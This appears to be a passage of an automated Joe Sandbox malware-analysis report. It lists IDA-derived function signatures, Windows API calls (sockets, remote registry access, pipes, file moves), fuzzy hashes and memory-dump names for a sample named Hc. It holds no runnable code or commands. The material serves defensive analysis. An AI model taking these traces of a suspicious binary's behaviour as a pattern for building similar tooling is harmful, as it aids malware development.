Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 648afab0da4a58aa4773168c18fe938704feda446694af143e2b100ef078a4c6
• Instruction ID: c3245bfae87fe16957217900d79bfd2a90ff76049be13de0fccf4262068d18c8
• Opcode Fuzzy Hash: 648afab0da4a58aa4773168c18fe938704feda446694af143e2b100ef078a4c6
• Instruction Fuzzy Hash: B151BF70A14659DFEF11CFA8D885BEEBBF8EF08320F14411AE955E7291D730A951CBA0
APIs
• _ValidateLocalCookies.LIBCMT ref: 002830BB
• ___except_validate_context_record.LIBVCRUNTIME ref: 002830C3
• _ValidateLocalCookies.LIBCMT ref: 00283151
• __IsNonwritableInCurrentImage.LIBCMT ref: 0028317C
• _ValidateLocalCookies.LIBCMT ref: 002831D1
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 1a010392715eaf9caecc857d5f2200d81311312d924a5a8d612b7c9c5eb8a80b
• Instruction ID: 1348096fea743bb3fcc4ce80c275b5979b89d2534f67a84e36a7d08a7541d002
• Opcode Fuzzy Hash: 1a010392715eaf9caecc857d5f2200d81311312d924a5a8d612b7c9c5eb8a80b
• Instruction Fuzzy Hash: 7241D638A212099BCF10EF58C885A9EBBB5AF44F24F148155E8186B3D2D771DB21CF91
APIs
  • Part of subcall function 002E3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 002E3AD7
  • Part of subcall function 002E3AAB: _wcslen.LIBCMT ref: 002E3AF8
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 002E1B6F
• WSAGetLastError.WSOCK32 ref: 002E1B7E
• WSAGetLastError.WSOCK32 ref: 002E1C26
• closesocket.WSOCK32(00000000), ref: 002E1C56
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
• String ID:
• API String ID: 2675159561-0
• Opcode ID: a618315d07bd1435e50f3e848203452cb0e355af19882b384f4142090666ffc2
• Instruction ID: 6518d8f3c60af37437e2db7559c4bf360ebaa9046447aa2fd240f89696b0a0a4
• Opcode Fuzzy Hash: a618315d07bd1435e50f3e848203452cb0e355af19882b384f4142090666ffc2
• Instruction Fuzzy Hash: 87412531650105AFDB109F25C848BB9B7EAEF40368F548069F8059F292D770EDA1CFE1
APIs
  • Part of subcall function 002CE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002CD7CD,?), ref: 002CE714
  • Part of subcall function 002CE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002CD7CD,?), ref: 002CE72D
• lstrcmpiW.KERNEL32(?,?), ref: 002CD7F0
• MoveFileW.KERNEL32(?,?), ref: 002CD82A
• _wcslen.LIBCMT ref: 002CD8B0
• _wcslen.LIBCMT ref: 002CD8C6
• SHFileOperationW.SHELL32(?), ref: 002CD90C
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
• String ID: \*.*
• API String ID: 3164238972-1173974218
• Opcode ID: 80a0b6c4d0e606087d13562b8055a00098bff0a6ac2245244b97367949008fdf
• Instruction ID: 8e11ab759ab1b2d49ad3b95e2ae3ce8519ad10820516018d54bef23ade4acce6
• Opcode Fuzzy Hash: 80a0b6c4d0e606087d13562b8055a00098bff0a6ac2245244b97367949008fdf
• Instruction Fuzzy Hash: 8D4182718152199EDF12EFA4D985FDE73B8AF08340F1001FAA509EB141EB34A799CF50
APIs
• GetInputState.USER32 ref: 002D4310
• TranslateAcceleratorW.USER32(?,00000000,?), ref: 002D4367
• TranslateMessage.USER32(?), ref: 002D4390
• DispatchMessageW.USER32(?), ref: 002D439A
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002D43AB
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Message$Translate$AcceleratorDispatchInputPeekState
• String ID: (3
• API String ID: 2256411358-113007392
• Opcode ID: c0d8502176fc1887fb373ca7e171f5e7c4cfdf04507053d150d9f3b7a16a3bb9
• Instruction ID: fd2f65bdfb3a5265a3a4807c298529e7d642fad122116e98a6eb53388e9b9464
• Opcode Fuzzy Hash: c0d8502176fc1887fb373ca7e171f5e7c4cfdf04507053d150d9f3b7a16a3bb9
• Instruction Fuzzy Hash: 5B318870524246DFEB65EF78D889B7737ACAB01314F2445ABD452C22A0D7B4ACA5CB11
APIs
• SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 002F38B8
• GetWindowLongW.USER32(?,000000F0), ref: 002F38EB
• GetWindowLongW.USER32(?,000000F0), ref: 002F3920
• SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 002F3952
• SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 002F397C
• GetWindowLongW.USER32(?,000000F0), ref: 002F398D
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 002F39A7
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
• Opcode ID: a30ea881dc9a6e5fc4a5d2ee4e418321250bf074e4d67f482720e3783b25f9a3
• Instruction ID: 8f0fadcab20857a7d552e3221fe1429a16b9c32ba5d3e2bf17071a235828ee26
• Opcode Fuzzy Hash: a30ea881dc9a6e5fc4a5d2ee4e418321250bf074e4d67f482720e3783b25f9a3
• Instruction Fuzzy Hash: 4631143161425AEFDB21CF59EC88F65B7A5EB867A0F141174F610CB2B1CBB0A964DB01
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002C80D0
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002C80F6
• SysAllocString.OLEAUT32(00000000), ref: 002C80F9
• SysAllocString.OLEAUT32(?), ref: 002C8117
• SysFreeString.OLEAUT32(?), ref: 002C8120
• StringFromGUID2.OLE32(?,?,00000028), ref: 002C8145
• SysAllocString.OLEAUT32(?), ref: 002C8153
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 0fa89d99fae3f8dc90d3c0e67f317e6c011bcb964425a33a34475aaba5a6de6f
• Instruction ID: 5a9c2e0f6c929d5772cbf833c034fb2261e3dc1d0d9455fdcdfb454e86850562
• Opcode Fuzzy Hash: 0fa89d99fae3f8dc90d3c0e67f317e6c011bcb964425a33a34475aaba5a6de6f
• Instruction Fuzzy Hash: 57219A76610119BF9F10DFA8DC88DBB73EDEB093607048525F909DB290DAB0DD46CB60
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002C81A9
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002C81CF
• SysAllocString.OLEAUT32(00000000), ref: 002C81D2
• SysAllocString.OLEAUT32 ref: 002C81F3
• SysFreeString.OLEAUT32 ref: 002C81FC
• StringFromGUID2.OLE32(?,?,00000028), ref: 002C8216
• SysAllocString.OLEAUT32(?), ref: 002C8224
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: fdb97e9d4036acacad14186b43ac98de0195aef5c4a22c3be148d96238a2dd34
• Instruction ID: 7775f2d9dc78f359193aeafea75aa50098c9b87eac609340115d1788788aaa38
• Opcode Fuzzy Hash: fdb97e9d4036acacad14186b43ac98de0195aef5c4a22c3be148d96238a2dd34
• Instruction Fuzzy Hash: 48217775610105BF9B109FA8EC8DDBA77ECEB09370705C125F905CB1A0DA70EC51CB65
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 002D0E99
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002D0ED5
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
• Opcode ID: e0035869141c1279586c396170dc2af364c173f2661bb7229698b6cb6eb56510
• Instruction ID: 570bd6c6ebf46929ee02765dbbee7d3b07aca70405fec5f6f78f9aacbd936a4a
• Opcode Fuzzy Hash: e0035869141c1279586c396170dc2af364c173f2661bb7229698b6cb6eb56510
• Instruction Fuzzy Hash: B6214D7451030AAFDB208F25D885B9A77A9BF54760F204A6AFCA5D72E0DB70DC60DB50
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 002D0F6D
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002D0FA8
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
• Opcode ID: 4f532ae0ddb88c73f013d7d334b3fa7a8a33b103dd7c6f9b5bad828173c4411b
• Instruction ID: d51bfdaf2d9de6558324c673868315b969a74e723749bea3060e947a0d17fa55
• Opcode Fuzzy Hash: 4f532ae0ddb88c73f013d7d334b3fa7a8a33b103dd7c6f9b5bad828173c4411b
• Instruction Fuzzy Hash: E3216075510346AFDB209F689C44B9A77A9BF55771F300A1AECA1D33E0DB709CA0DB50
APIs
  • Part of subcall function 00267873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002678B1
  • Part of subcall function 00267873: GetStockObject.GDI32(00000011), ref: 002678C5
  • Part of subcall function 00267873: SendMessageW.USER32(00000000,00000030,00000000), ref: 002678CF
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 002F4BB0
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 002F4BBD
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 002F4BC8
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 002F4BD7
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 002F4BE3
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
• Opcode ID: 90af66ce320128140e1a07fdabbbbb6c9fe5833716065f0a139a41bd85a59b69
• Instruction ID: 14daf4fbbee1e077561be462bea420b20cc4f5af08b9675a469dfad81fc1056e
• Opcode Fuzzy Hash: 90af66ce320128140e1a07fdabbbbb6c9fe5833716065f0a139a41bd85a59b69
• Instruction Fuzzy Hash: 4D1184B155011DBEEB115FA4DC85EEBBF5DEF087A8F014110F604A6050C671DC219BA0
APIs
  • Part of subcall function 0029DB23: _free.LIBCMT ref: 0029DB4C
• _free.LIBCMT ref: 0029DBAD
  • Part of subcall function 00292D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0029DB51,00331DC4,00000000,00331DC4,00000000,?,0029DB78,00331DC4,00000007,00331DC4,?,0029DF75,00331DC4), ref: 00292D4E
  • Part of subcall function 00292D38: GetLastError.KERNEL32(00331DC4,?,0029DB51,00331DC4,00000000,00331DC4,00000000,?,0029DB78,00331DC4,00000007,00331DC4,?,0029DF75,00331DC4,00331DC4), ref: 00292D60
• _free.LIBCMT ref: 0029DBB8
• _free.LIBCMT ref: 0029DBC3
• _free.LIBCMT ref: 0029DC17
• _free.LIBCMT ref: 0029DC22
• _free.LIBCMT ref: 0029DC2D
• _free.LIBCMT ref: 0029DC38
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
• Instruction ID: 6492b0a50e696b2fddeceb8660e5470c48026096ac21c0894140a23c04c9faff
• Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
• Instruction Fuzzy Hash: 06115172561B04FADD20BBB0CD07FCB77DC9F24714F410C19B399AA152DA75B6249E90
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memcmp
                                                                                                                                                                        • String ID: j`,
                                                                                                                                                                        • API String ID: 2931989736-3978596512
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 002CE328
                                                                                                                                                                        • LoadStringW.USER32(00000000), ref: 002CE32F
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 002CE345
                                                                                                                                                                        • LoadStringW.USER32(00000000), ref: 002CE34C
                                                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002CE390
                                                                                                                                                                        Strings
                                                                                                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 002CE36D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleLoadModuleString$Message
                                                                                                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                        • API String ID: 4072794657-3128320259
                                                                                                                                                                        APIs
                                                                                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 002D1322
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00000000,?), ref: 002D1334
                                                                                                                                                                        • TerminateThread.KERNEL32(00000000,000001F6), ref: 002D1342
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 002D1350
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002D135F
                                                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 002D136F
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00000000), ref: 002D1376
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3495660284-0
                                                                                                                                                                        APIs
                                                                                                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 002E281D
                                                                                                                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 002E283E
                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 002E284F
                                                                                                                                                                        • htons.WSOCK32(?,?,?,?,?), ref: 002E2938
                                                                                                                                                                        • inet_ntoa.WSOCK32(?), ref: 002E28E9
                                                                                                                                                                          • Part of subcall function 002C433E: _strlen.LIBCMT ref: 002C4348
                                                                                                                                                                          • Part of subcall function 002E3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,002DF669), ref: 002E3C9D
                                                                                                                                                                        • _strlen.LIBCMT ref: 002E2992
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3203458085-0
                                                                                                                                                                        APIs
                                                                                                                                                                        • __allrem.LIBCMT ref: 0029042A
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00290446
                                                                                                                                                                        • __allrem.LIBCMT ref: 0029045D
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0029047B
                                                                                                                                                                        • __allrem.LIBCMT ref: 00290492
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002904B0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1992179935-0
                                                                                                                                                                        APIs
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00288649,00288649,?,?,?,002967C2,00000001,00000001,8BE85006), ref: 002965CB
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,002967C2,00000001,00000001,8BE85006,?,?,?), ref: 00296651
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0029674B
                                                                                                                                                                        • __freea.LIBCMT ref: 00296758
                                                                                                                                                                          • Part of subcall function 00293B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00286A79,?,0000015D,?,?,?,?,002885B0,000000FF,00000000,?,?), ref: 00293BC5
                                                                                                                                                                        • __freea.LIBCMT ref: 00296761
                                                                                                                                                                        • __freea.LIBCMT ref: 00296786
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
APIs
  • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
  • Part of subcall function 002ED3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002EC10E,?,?), ref: 002ED415
  • Part of subcall function 002ED3F8: _wcslen.LIBCMT ref: 002ED451
  • Part of subcall function 002ED3F8: _wcslen.LIBCMT ref: 002ED4C8
  • Part of subcall function 002ED3F8: _wcslen.LIBCMT ref: 002ED4FE
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002EC72A
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002EC785
• RegCloseKey.ADVAPI32(00000000), ref: 002EC7CA
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002EC7F9
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 002EC853
• RegCloseKey.ADVAPI32(?), ref: 002EC85F
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
• String ID:
• API String ID: 1120388591-0
APIs
• VariantInit.OLEAUT32(00000035), ref: 002C00A9
• SysAllocString.OLEAUT32(00000000), ref: 002C0150
• VariantCopy.OLEAUT32(002C0354,00000000), ref: 002C0179
• VariantClear.OLEAUT32(002C0354), ref: 002C019D
• VariantCopy.OLEAUT32(002C0354,00000000), ref: 002C01A1
• VariantClear.OLEAUT32(?), ref: 002C01AB
Similarity
• API ID: Variant$ClearCopy$AllocInitString
• String ID:
• API String ID: 3859894641-0
APIs
  • Part of subcall function 002641EA: _wcslen.LIBCMT ref: 002641EF
  • Part of subcall function 00268577: _wcslen.LIBCMT ref: 0026858A
• GetOpenFileNameW.COMDLG32(00000058), ref: 002D9F2A
• _wcslen.LIBCMT ref: 002D9F4B
• _wcslen.LIBCMT ref: 002D9F72
• GetSaveFileNameW.COMDLG32(00000058), ref: 002D9FCA
Strings
Similarity
• API ID: _wcslen$FileName$OpenSave
• String ID: X
• API String ID: 83654149-3081909835
APIs
• _wcslen.LIBCMT ref: 002D6F21
• CoInitialize.OLE32(00000000), ref: 002D707E
• CoCreateInstance.OLE32(00300CC4,00000000,00000001,00300B34,?), ref: 002D7095
• CoUninitialize.OLE32 ref: 002D7319
Strings
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 002D11B3
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 002D11EE
• EnterCriticalSection.KERNEL32(?), ref: 002D120A
• LeaveCriticalSection.KERNEL32(?), ref: 002D1283
• ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 002D129A
• InterlockedExchange.KERNEL32(?,000001F6), ref: 002D12C8
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
• String ID:
• API String ID: 3368777196-0
APIs
• ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,002BFBEF,00000000,?,?,00000000,?,002A39E2,00000004,00000000,00000000), ref: 002F8CA7
• EnableWindow.USER32(?,00000000), ref: 002F8CCD
• ShowWindow.USER32(FFFFFFFF,00000000), ref: 002F8D2C
• ShowWindow.USER32(?,00000004), ref: 002F8D40
• EnableWindow.USER32(?,00000001), ref: 002F8D66
• SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 002F8D8A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
